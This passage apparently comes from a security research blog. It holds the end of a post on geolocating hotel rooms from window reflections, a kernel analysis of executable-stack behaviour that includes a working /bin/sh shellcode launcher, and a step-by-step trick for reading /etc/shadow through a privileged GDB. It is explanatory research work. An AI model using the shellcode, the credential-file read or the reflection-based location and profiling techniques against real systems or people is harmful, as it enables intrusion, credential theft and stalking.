By clicking on each mark we can see more detailed information. According to this website, the one on the right is used only for offices and retail, but not for lodging: 
However, the other one seems to be our building:
A quick search leads us to the Fairmont Pacific Rim’s Website, where it’s easy to find pictures from inside the hotel:
The virtual tour for the Deluxe Room has exactly the same view:
Turn our virtual head to the left… and voilà, our square lamp:
Now, let’s find out how high up the picture was taken from. Let’s view our hotel from the Convention Centre’s perspective and estimate the floor:
From my perspective, it appears to be between the 17th and 20th floor, so I asked the person who took the picture to corroborate:
 
CASE #3 – Des Moines, IA – 1
An easy one: there are not many tall buildings in Des Moines, Iowa, so it was fairly easy to spot this one:
It seems that the building in front is a parking garage. The drapes look narrow and are white/pearl in color. The fans on the rooftop were easy to locate on Google Maps:
And we could corroborate using the Street View feature:
We found it was the Des Moines Marriott Downtown. Looking for pictures on TripAdvisor, we found what seems to be the same drapery:
Which floor? Let’s move our head and look towards the window where the picture was taken:
The 3D model also helps:
And… almost!
CASE #4 – Des Moines, IA – 2
Another easy case from the same hotel as the previous case. Look at the detailed reflections: the beds, the portraits, the TV, etc.
These were easy-to-spot elements using Foursquare and TripAdvisor:
Misc. Ideas / Further Research
While brainstorming with my friend Diego Madero about reflections, he suggested going deeper by including image processing to separate the reflections from the original picture. It’s definitely a good idea; however, it takes time to do this (as far as I know).
We also discussed the idea that you could use the information disclosed in reflections to develop a profile of an individual. For example, if the person called room service (plates and bottles reflected), what brand of laptop they are using (logo reflected), or whether they are storing something in the safe (if it’s closed or there’s an indicator like an LED perhaps).
Conclusion
Clear and simple: the reflected images in pictures might disclose information that you wouldn’t be willing to share, such as your location or other personal details. If you don’t want to disclose your location, eliminate reflections by choosing a better angle or simply turning off all of the lights inside the room (including the TV) before taking the picture.
Also, it’s evident that reflections are not only present in windows. While I only considered reflections in windows from different hotels, other things can reflect the surrounding environment:
  • “44 Impressive Examples of Reflection Photography”
Finally, do not forget that a reflection could be your enemy.
Recommendations
Here are some other useful links:
  • “How to Eliminate Reflections in Glasses in Portraits”
  • “How to remove the glare and brightness in an image (Image preprocessing)”
Thanks for reading.
References:
[1] “Geolocation”
[2] “Glass – Optical Properties”
[3] “OSINT – Open Source Intelligence”
INSIGHTS | November 27, 2013

A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

This is a short and basic analysis I did when I was uncertain about code execution in the data memory segment. Later on, I describe what’s happening on the kernel side, as well as what seems to be a small logic bug.
I’m not a kernel hacker/developer/ninja; I’m just a Linux user trying to figure out the reason for this behavior by looking in key places such as the ELF loader and other related functions. So, if you see any mistakes, or you realize that I approached this the wrong way, please let me know; I’d really appreciate it.
This article could also be useful for anyone starting out in shellcoding, since they might think their code is wrong when, in reality, there are other things to take care of before they can test the functionality of their shellcode or any other kind of code.
USER-LAND: Why is it possible to execute code in the data segment if it doesn’t have the PF_EXEC enabled?
A couple of weeks ago I was reading an article (in Spanish) about shellcode creation in Linux x64. For demonstration purposes I’ll use this 64-bit execve(“/bin/sh”) shellcode:

#include <unistd.h>

char shellcode[] =
    "\x48\x31\xd2\x48\x31\xf6\x48\xbf"
    "\x2f\x62\x69\x6e\x2f\x73\x68\x11"
    "\x48\xc1\xe7\x08\x48\xc1\xef\x08"
    "\x57\x48\x89\xe7\x48\xb8\x3b\x11"
    "\x11\x11\x11\x11\x11\x11\x48\xc1"
    "\xe0\x38\x48\xc1\xe8\x38\x0f\x05";

int main(int argc, char **argv) {
    void (*fp)();
    fp = (void (*)())shellcode;
    (void)(*fp)();

    return 0;
}

The author suggests the following for the proper execution of the shellcode:

“We compile and with the execstack utility we specify that the stack region used in the binary will be executable…”.

Immediately, I thought it was wrong, because the code to be executed would be placed in the ‘shellcode’ symbol in the .data section within the ELF file, which, in turn, would be in the data memory segment at runtime, not in the stack segment. For some reason, when trying to execute it without enabling the executable stack bit, it failed; the opposite happened when that bit was enabled:

 

According to the execstack’s man-page:

“… ELF binaries and shared libraries now can be marked as requiring executable stack or not requiring it… This marking is done through the p_flags field in the PT_GNU_STACK program header entry… The marking is done automatically by recent GCC versions”.
It only modifies one bit, adding the PF_EXEC flag to the PT_GNU_STACK program header. The same change can be made by editing the binary with an ELF editor such as HT Editor, or at link time by passing the argument ‘-z execstack’ to gcc.
The change can be seen simply by observing the RWE flags (Read, Write, Execute) with the readelf utility. In our case, only the ‘E’ flag was added to the stack memory segment.
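For reference, both ways of flipping that bit, plus the readelf check, look like this (a sketch; the binary names follow the example):

# At link time:
$gcc -o shellcode_execstack shellcode.c -z execstack

# Or on an existing binary, with the execstack utility:
$execstack -s shellcode    # set the executable-stack marking
$execstack -q shellcode    # query it: 'X' means executable

# Inspect the PT_GNU_STACK flags (RW vs. RWE):
$readelf -l shellcode_execstack | grep -A1 GNU_STACK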

 
The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.

So far, everything makes sense to me. But wait a minute: the shellcode, or any other variable declared outside main(), is not supposed to be on the stack, right? Instead, it should be placed in the section where the initialized data resides (as far as I know, normally .data or .rodata). Let’s see where exactly it is by showing the symbol table and the corresponding section of each symbol (where applicable):

It’s pretty clear that our shellcode will be located at the memory address 0x00600840 at runtime and that the bytes reside in the .data section. The same result holds for the other binary, ‘shellcode_execstack’.

By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header; that’s why it’s not possible to jump to and execute code in that segment at runtime (Segmentation Fault). But when the stack is executable, why is it also possible to execute code in the data segment if it doesn’t have that flag enabled?

 
Is this normal behavior, or is it a bug in the dynamic linker or the kernel that doesn’t take that flag into account when loading ELFs? To take the dynamic linker out of the game, my fellow Ilja van Sprundel gave me the idea to compile with -static to create a standalone executable. A static binary doesn’t pass through the dynamic linker; instead, it’s loaded directly by the kernel (as far as I know). The same result was obtained with this one, so everything pointed directly to the kernel.
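Reproducing that static test is a one-liner (same source as above):

# Static binary: loaded directly by the kernel, no dynamic linker involved
$gcc -static -o shellcode_static shellcode.c -z execstack
$./shellcode_static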

I tested this in a 2.6 kernel (x86_64) and in a 3.2 kernel (i686), and I got the same behavior in both.
KERNEL-LAND: Is that a bug in elf_read_implies_exec()?

Now, for the interesting part: what is really happening on the kernel side? I went straight to load_elf_binary() in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment so as to set the executable_stack variable correctly:

        int executable_stack = EXSTACK_DEFAULT;

        elf_ppnt = elf_phdata;
        for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
                if (elf_ppnt->p_type == PT_GNU_STACK) {
                        if (elf_ppnt->p_flags & PF_X)
                                executable_stack = EXSTACK_ENABLE_X;
                        else
                                executable_stack = EXSTACK_DISABLE_X;
                        break;
                }

Keep in mind that only those three constants about executable stack are defined in the kernel (linux-2.6.32.61/include/linux/binfmts.h):

/* Stack area protections */
#define EXSTACK_DEFAULT    0  /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X  1  /* Disable executable stacks */
#define EXSTACK_ENABLE_X   2  /* Enable executable stacks */

Later on, the process’ personality is updated as follows:

        /* Do this immediately, since STACK_TOP as used in setup_arg_pages
           may depend on the personality.  */
        SET_PERSONALITY(loc->elf_ex);
        if (elf_read_implies_exec(loc->elf_ex, executable_stack))
                current->personality |= READ_IMPLIES_EXEC;

        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
                current->flags |= PF_RANDOMIZE;

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

/*
 * An executable for which elf_read_implies_exec() returns TRUE
 * will have the READ_IMPLIES_EXEC personality flag set automatically.
 */
#define elf_read_implies_exec(ex, executable_stack) \
        (executable_stack != EXSTACK_DISABLE_X)

In our case, having an ELF binary with the PF_EXEC flag enabled in the PT_GNU_STACK program header, that macro returns TRUE since EXSTACK_ENABLE_X != EXSTACK_DISABLE_X; thus, our process’ personality will have the READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in some memory-related functions such as mmap.c, mprotect.c, and nommu.c (all in linux-2.6.32.61/mm/). For instance, when the VMAs (Virtual Memory Areas) are created by the do_mmap_pgoff() function in mmap.c, it verifies the personality so it can add PROT_EXEC (execution allowed) to the memory segments [1]:

        /*
         * Does the application expect PROT_READ to imply PROT_EXEC?
         *
         * (the exception is when the underlying filesystem is noexec
         *  mounted, in which case we dont add PROT_EXEC.)
         */
        if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
                if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
                        prot |= PROT_EXEC;

And basically, that’s the reason why code in the data segment can be executed when the stack is executable.

On the other hand, I had an idea: delete the PT_GNU_STACK program header by changing its type to any other random value. Doing that, executable_stack would remain EXSTACK_DEFAULT when compared in elf_read_implies_exec(), which would still return TRUE, right? Let’s see:


The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead; note that the second LOAD (the data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled:

 

The code was executed even though the execution flag is not enabled in the program header that holds it. I think it’s a logic bug in elf_read_implies_exec(), because one can simply delete the PT_GNU_STACK header so that executable_stack = EXSTACK_DEFAULT, making elf_read_implies_exec() return TRUE. Instead of comparing against EXSTACK_DISABLE_X, it should return TRUE only if executable_stack is EXSTACK_ENABLE_X:

#define elf_read_implies_exec(ex, executable_stack) \
        (executable_stack == EXSTACK_ENABLE_X)

Anyway, perhaps that’s the normal behavior of the Linux kernel for compatibility reasons or something else, but isn’t it weird that, by making the stack executable or deleting the PT_GNU_STACK header, all the memory segments are loaded with execute permissions even when the PF_EXEC flag is not set?

What do you think?
Side notes:
  • Kernel developers pass loc->elf_ex into elf_read_implies_exec(), but the macro never uses it:

#define elf_read_implies_exec(ex, executable_stack) \
        (executable_stack != EXSTACK_DISABLE_X)

  • Two constants are defined but never used in the whole kernel code:

#define INTERPRETER_NONE 0
#define INTERPRETER_ELF  2
Finally, I’d like to thank my colleagues Ilja van Sprundel and Diego Bauche Madero for giving me some ideas.
Thanks for reading.
References:
[1] “Understanding the Linux Virtual Memory Manager”. Mel Gorman.
Chapter 4 – Process Address Space.

 

INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file; ten lines is the default.)

 

Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 

 

The following is a simple trick where you can use GDB as a trampoline to read a file you don’t originally have enough permission to read. This trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.

 

Here are the steps:


1. Compile ‘foo.c‘ with the GNU Compiler (GCC) using the -ggdb flag.

2. Open the resulting ELF executable with GDB and use the list command to read its source code, as sketched below:
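In commands, steps 1 and 2 look roughly like this (a sketch):

# Step 1: -ggdb embeds debugging info, including the source
# filename recorded in .debug_line
$gcc -ggdb foo.c -o foo

# Step 2: GDB resolves the filename and prints the source
$gdb -q ./foo
(gdb) list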

 

3. Make a copy of ‘foo.c’ and call it ‘_etc_shadow.c’, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable as in the following screen shot.

 

4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.
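To locate the bytes to patch before opening the hex editor, strings with file offsets helps (a sketch):

# Print the file offsets (in hex) of the hardcoded source filename
$strings -a -t x foo | grep _etc_shadow.c

# Then, in the hex editor, overwrite the first two occurrences with
# "/etc/shadow" followed by a NULL byte.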

 

5. Evidently, it won’t work unless you have sufficient user privileges; otherwise, GDB won’t be able to read /etc/shadow.

 

6. If you trace the open() syscalls executed by GDB:

 ($strace -e open gdb ./_etc_shadow)

you can see that the call returns -1 (EACCES) because of insufficient permissions.
 

7. Now imagine that for some reason GDB is a privileged command (the SUID (Set User ID) bit in the permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’ because the gdb command would be executed with root privileges.

 

8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow certain commands to be executed. (To be honest I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve).

 

9. You cannot display the contents of ‘/etc/shadow’ by using the cat command because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the source file (/etc/shadow).
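A sketch of how such a session could look, under the hypothetical policy above (gdb authorized, cat not):

$sudo cat /etc/shadow    # denied: /bin/cat is not an authorized command
$sudo gdb -q ./foo
(gdb) list               # GDB runs as root and prints /etc/shadow as the "source"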

 

Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.